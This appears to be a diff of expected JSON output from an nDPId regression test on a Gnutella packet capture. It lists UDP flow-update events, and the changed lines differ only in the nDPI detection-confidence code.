00563{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":83520,"flow_last_seen":253025,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"76.30.86.144","src_port":28681,"dst_port":53821,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00802{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90184,"flow_last_seen":180130,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":3575,"flow_avg_l4_payload_len":357,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"203.220.198.244","src_port":28681,"dst_port":1194,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00802{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90184,"flow_last_seen":180130,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":3575,"flow_avg_l4_payload_len":357,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"203.220.198.244","src_port":28681,"dst_port":1194,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00570{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":304,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":90880,"flow_last_seen":251799,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":5105,"flow_avg_l4_payload_len":283,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"193.32.126.214","src_port":28681,"dst_port":59596,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00565{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":82063,"flow_last_seen":251735,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"190.153.143.54","src_port":28681,"dst_port":65535,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00564{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":82060,"flow_last_seen":253024,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"87.69.142.133","src_port":28681,"dst_port":15471,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00565{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":88941,"flow_last_seen":179376,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":511,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"75.133.101.93","src_port":28681,"dst_port":52367,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00801{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90073,"flow_last_seen":174761,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":3575,"flow_avg_l4_payload_len":357,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"46.128.114.107","src_port":28681,"dst_port":6578,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00798{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":89967,"flow_last_seen":152618,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"185.203.218.92","src_port":28681,"dst_port":56962,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00803{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":90072,"flow_last_seen":180633,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":5191,"flow_avg_l4_payload_len":370,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"103.232.107.100","src_port":28681,"dst_port":43508,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00801{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90073,"flow_last_seen":174761,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":3575,"flow_avg_l4_payload_len":357,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"46.128.114.107","src_port":28681,"dst_port":6578,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00798{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":89967,"flow_last_seen":152618,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"185.203.218.92","src_port":28681,"dst_port":56962,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00803{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":90072,"flow_last_seen":180633,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":5191,"flow_avg_l4_payload_len":370,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"103.232.107.100","src_port":28681,"dst_port":43508,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00570{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":300,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":90809,"flow_last_seen":139723,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1817,"flow_avg_l4_payload_len":227,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"104.238.172.250","src_port":28681,"dst_port":23548,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00562{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":82062,"flow_last_seen":191700,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"92.88.92.56","src_port":28681,"dst_port":21009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00565{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":82063,"flow_last_seen":251737,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"165.169.195.227","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00801{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":89966,"flow_last_seen":180691,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":4383,"flow_avg_l4_payload_len":365,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"51.68.153.214","src_port":28681,"dst_port":26253,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00798{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":90039,"flow_last_seen":163151,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.246.156.126","src_port":28681,"dst_port":50297,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00796{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":89966,"flow_last_seen":152619,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.88.117.218","src_port":28681,"dst_port":6909,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00801{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":89966,"flow_last_seen":180691,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":4383,"flow_avg_l4_payload_len":365,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"51.68.153.214","src_port":28681,"dst_port":26253,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00798{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":90039,"flow_last_seen":163151,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.246.156.126","src_port":28681,"dst_port":50297,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00796{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":89966,"flow_last_seen":152619,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.88.117.218","src_port":28681,"dst_port":6909,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00564{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":82060,"flow_last_seen":192907,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"121.99.222.36","src_port":28681,"dst_port":44988,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00563{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":82061,"flow_last_seen":132833,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"66.131.24.72","src_port":28681,"dst_port":30711,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00798{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":90039,"flow_last_seen":163151,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"82.181.251.218","src_port":28681,"dst_port":36368,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00798{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":90039,"flow_last_seen":163151,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"82.181.251.218","src_port":28681,"dst_port":36368,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00564{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":82057,"flow_last_seen":253025,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.244.228.86","src_port":28681,"dst_port":10131,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00561{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":82061,"flow_last_seen":253025,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"41.99.164.4","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00569{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":303,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":90871,"flow_last_seen":251762,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1247,"flow_avg_l4_payload_len":207,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"142.132.165.13","src_port":28681,"dst_port":30566,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00800{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":89829,"flow_last_seen":174144,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":3570,"flow_avg_l4_payload_len":357,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.65.68.194","src_port":28681,"dst_port":35481,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00800{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":89829,"flow_last_seen":174144,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":3570,"flow_avg_l4_payload_len":357,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.65.68.194","src_port":28681,"dst_port":35481,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00565{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":82059,"flow_last_seen":131671,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"142.197.219.85","src_port":28681,"dst_port":26234,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00568{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":301,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":90845,"flow_last_seen":174321,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1001,"flow_avg_l4_payload_len":166,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"188.61.52.183","src_port":28681,"dst_port":11852,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00564{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":82058,"flow_last_seen":251736,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.227.162.150","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00563{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":82066,"flow_last_seen":253024,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"91.179.98.234","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00801{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":90138,"flow_last_seen":252085,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":3710,"flow_avg_l4_payload_len":309,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"60.241.48.194","src_port":28681,"dst_port":21301,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00801{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":90138,"flow_last_seen":252085,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":3710,"flow_avg_l4_payload_len":309,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"60.241.48.194","src_port":28681,"dst_port":21301,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00570{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":89016,"flow_last_seen":176659,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":4777,"flow_avg_l4_payload_len":251,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"104.156.226.72","src_port":28681,"dst_port":53258,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00565{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":159,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":82058,"flow_last_seen":191704,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.163.231.160","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00568{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":302,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":90864,"flow_last_seen":124089,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":943,"flow_avg_l4_payload_len":235,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"185.187.74.173","src_port":28681,"dst_port":53489,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00801{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":90039,"flow_last_seen":180164,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":5191,"flow_avg_l4_payload_len":370,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.61.221.246","src_port":28681,"dst_port":30577,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 